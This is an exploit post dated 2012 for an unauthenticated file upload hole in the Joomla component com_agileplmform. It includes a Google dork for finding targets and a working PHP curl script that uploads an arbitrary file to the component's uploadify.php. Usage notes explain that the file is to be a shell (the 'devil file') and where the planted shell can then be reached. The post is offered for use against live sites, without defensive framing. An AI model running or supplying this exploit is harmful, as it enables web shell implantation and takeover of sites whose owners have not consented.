+----------------------------------------------------------------------+
# Exploit Title: joomla component com_agileplmform file upload vulnerability
# Google Dork: inurl:components/com_agileplmform
# Date: 04/08/2012
# Author: Tunisian spl01t3r
____ (_) ____ ___
( _ \| |( _ \ / _ \
| | | | || | | x |_|
| ||_/|_|| ||_/ \___/
|_| |_|
_
(_) ____ ____ ____ _____
| | / __| / __| \__ \ / ` \
| | \___ \ \___ \ / _ \_ | Y Y \
|_| |____/ |____/ (___ / |_|_| /
\/ \/
+----------------------------------------------------------------------+
[+] exploit
<?php
/* example of using
$uploadfile="C:\AppServ\www\Tunisia.php"; */
$uploadfile="C:\AppServ\www\b.php";
$ch = curl_init("http://[SERVER]/[path]/components/com_agileplmform/views/agileplmform/js/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/components/com_agileplmform/views/agileplmform/js/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
[+] how TO use
Tunisia.php must be the devil file 3:)
!!!shell!!!
TN> http://[SERVER]/[path]/components/com_agileplmform/views/agileplmform/js/
Filename : $postResult output
+----------------------------------------------------------------------+
[+] greetz to : BIbou sfaxien ; mech lazem ; tn_scorpion ; anas laaribi ;
jendoubi ahmed ; s-man ; chaouki mkachakh & ;) --Geni ryodan-- ;)
daly azrail ; med bradai ; 7rouz ; ghazy info ; mohamed bel ;
hassen ben mbarek ; prince bibou ; hag whag ; anis van toets
& all tn_spl01t3r's freinds
mAhna mAhna
[+] profile : www.facebook.com/TN.spl0it3r
+----------------------------------------------------------------------+